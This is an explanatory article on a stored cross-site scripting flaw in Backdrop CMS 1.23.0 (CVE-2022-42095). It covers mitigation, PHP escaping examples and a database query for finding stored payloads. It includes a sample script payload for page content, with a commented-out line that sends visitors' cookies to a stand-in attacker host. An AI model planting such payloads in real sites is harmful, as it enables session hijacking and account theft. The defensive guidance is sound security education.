Backdrop CMS is a popular open-source content management system used by thousands of websites, particularly those looking for a Drupal alternative. In October 2022, a security issue affecting version 1.23.0 surfaced: a stored cross-site scripting (XSS) vulnerability, tracked as CVE-2022-42095. The flaw lets an attacker who can edit content plant JavaScript in a page so that it runs in the browser of every visitor, site administrators included.
This article will break down the vulnerability in simple terms, show you how it can be exploited, and provide resources for further reading.
What is Stored XSS?
XSS (Cross-Site Scripting) is a vulnerability where attacker-supplied script ends up in a page served by a trusted site and runs with that site's origin. "Stored XSS" is more dangerous than "reflected XSS" because the payload is saved on the server and executes for every user who views the compromised content, with no crafted link required.
Attackers typically use stored XSS to steal cookies or session tokens, read data the victim is allowed to see, or perform actions as the victim.
Where’s the Flaw?
Backdrop CMS lets admins and suitably permissioned users create "Pages" through its admin interface. In version 1.23.0 the "Page" content field did not sufficiently sanitize input, so an attacker could store arbitrary JavaScript in the page body. Whenever any user, admin or otherwise, views the poisoned page, the JavaScript runs in their browser with the site's origin and the viewer's own session.
Sources:
- NVD - CVE-2022-42095
- Backdrop CMS Change Log
Get Access:
Attackers first need an account that can create or edit Page content (an unprivileged editor is enough), or they exploit a separate weakness to reach the page creation/editor function.
Inject Malicious Script:
In the "Page" creation/edit screen, they input malicious JavaScript in the "Content" field.
Trigger the Payload:
Once the page is saved, anyone visiting it, admins included, unknowingly runs the injected script.
Here's a snippet an attacker might save as the "Page" content:

```html
<h1>Welcome to our website!</h1>
<script>
  alert('XSS - CVE-2022-42095');
  // Exfiltrate cookies (illustration only, never do this):
  // fetch('http://attacker-website.com/log?cookie=' + encodeURIComponent(document.cookie));
</script>
```
What happens?
Any visitor to this page sees an alert box pop up. A real attacker would instead work silently: steal cookies, hijack sessions, or drive the admin UI with the victim's own session. Because the script runs same-origin, it can read Backdrop's form tokens before submitting forms, so CSRF protection does not stop it.
Update Backdrop CMS
Always run the latest release from the Backdrop CMS downloads page. This flaw was patched in 1.23.1 and later. Note that updating does not delete content that is already in the database, so review Page content created while the vulnerable version was live.
Input Validation
Render user content through a text format with an allow-list of tags rather than printing it raw. Don't rely solely on core updates: audit custom modules and themes for print/echo statements that output field values or request data without escaping.
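The pattern to hunt for in a theme or custom module, and the safe alternatives, as an added example written for this article (not Backdrop core code and not from the original post). It assumes a bootstrapped Backdrop 1.x site, where `field_get_items()`, `check_markup()`, `filter_xss()` and `check_plain()` come from core; the `example_` function names are hypothetical.

```php
<?php
// Added example, not Backdrop core code. Assumes a bootstrapped Backdrop 1.x
// site so the core helpers below are available.

/**
 * UNSAFE: prints the raw stored value. Any <script> an editor saved runs in
 * every visitor's browser. This is the pattern to look for in node.tpl.php,
 * page.tpl.php and custom preprocess functions.
 */
function example_render_body_unsafe($node) {
  $items = field_get_items('node', $node, 'body');
  return $items ? $items[0]['value'] : '';
}

/**
 * SAFE: runs the value through the text format it was saved with.
 * check_markup() applies that format's filters; the stock "Filtered HTML"
 * format keeps only an allow-list of tags, so <script> never reaches the page.
 */
function example_render_body_safe($node) {
  $items = field_get_items('node', $node, 'body');
  if (!$items) {
    return '';
  }
  return check_markup($items[0]['value'], $items[0]['format'], $node->langcode);
}

/**
 * Defence in depth for HTML assembled outside the field system (e.g. a custom
 * block that concatenates user data): filter_xss() drops any tag not in the
 * allow-list and also strips on* event attributes and javascript: URLs from
 * the tags it keeps.
 */
function example_render_fragment($html) {
  $allowed = array('a', 'em', 'strong', 'p', 'ul', 'ol', 'li', 'br');
  return filter_xss($html, $allowed);
}

/**
 * For values that should never contain markup (titles, usernames, log
 * messages) allow no HTML at all: check_plain() entity-encodes < > & and ".
 */
function example_render_plain($text) {
  return check_plain($text);
}
```

When grepping a code base, the quick tell is `print $node->body` or `print $items[0]['value']` (or the `{$var}` equivalent inside a template) with no `check_markup()`, `filter_xss()` or `check_plain()` wrapping it.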
Least Privilege Principle
Limit page creation/edit rights to trusted roles, and restrict any text format that permits raw HTML (such as Full HTML) to administrators only.
Regular Security Audits
Scan your site for vulnerabilities with tools like OWASP ZAP or Burp Suite, and periodically review stored content for markup that should not be there.
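A scanner sees only rendered pages; a payload that is already in the database is found faster by querying the content tables directly. The following is an added example for this article (not part of Backdrop or the original post) that hunts for script-bearing markup stored in Page bodies. It assumes a bootstrapped Backdrop 1.x context (for instance a one-off script run against the site) and the standard field storage table `field_data_body` with columns `entity_type`, `entity_id`, `body_value` and `body_format`; the `example_` function name is hypothetical.

```php
<?php
// Added example, not Backdrop core code. Assumes a bootstrapped Backdrop 1.x
// site and the standard field_data_body storage table.

/**
 * Returns node IDs whose stored body looks like an XSS payload, keyed by nid,
 * with the matching pattern and the text format the body was saved with.
 * The LIKE patterns are deliberately loose heuristics; review every hit.
 */
function example_find_stored_xss_candidates() {
  $patterns = array(
    'inline <script>' => '%<script%',
    'on* event handler' => '% on_%=%',      // e.g. " onerror=", " onload="
    'javascript: URL' => '%javascript:%',
  );
  $hits = array();
  foreach ($patterns as $label => $like) {
    $query = db_select('field_data_body', 'b')
      ->fields('b', array('entity_id', 'body_format'))
      ->condition('b.entity_type', 'node')
      ->condition('b.body_value', $like, 'LIKE');
    foreach ($query->execute() as $row) {
      $hits[$row->entity_id][] = $label . ' (format: ' . $row->body_format . ')';
    }
  }
  return $hits;
}

// Report. A hit saved with a raw-HTML format such as full_html is the
// dangerous case: no filter will neutralise it at render time.
foreach (example_find_stored_xss_candidates() as $nid => $reasons) {
  print "node/$nid: " . implode(', ', $reasons) . "\n";
}
```

The `body_format` column is the important second signal: a `<script>` tag stored under Filtered HTML is stripped on output, while the same tag under Full HTML (or under a theme that prints the raw value) reaches every visitor.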
References
- CVE-2022-42095: NVD Entry
- Backdrop CMS Issue #5412
- Backdrop CMS Security Release 1.23.1
- OWASP XSS Explained
In Conclusion
CVE-2022-42095 in Backdrop CMS is a prime example of how dangerous stored XSS can be, particularly when it affects core content types. By understanding how the exploit works, you can better secure your own sites and educate teammates or clients. Remember: update, sanitize, and audit—security is everyone’s job!
*If you’re running Backdrop CMS, update now. Spread the word—secure coding saves headaches and reputations!*
Timeline
Published on: 11/23/2022 02:15:00 UTC
Last modified on: 11/30/2022 14:28:00 UTC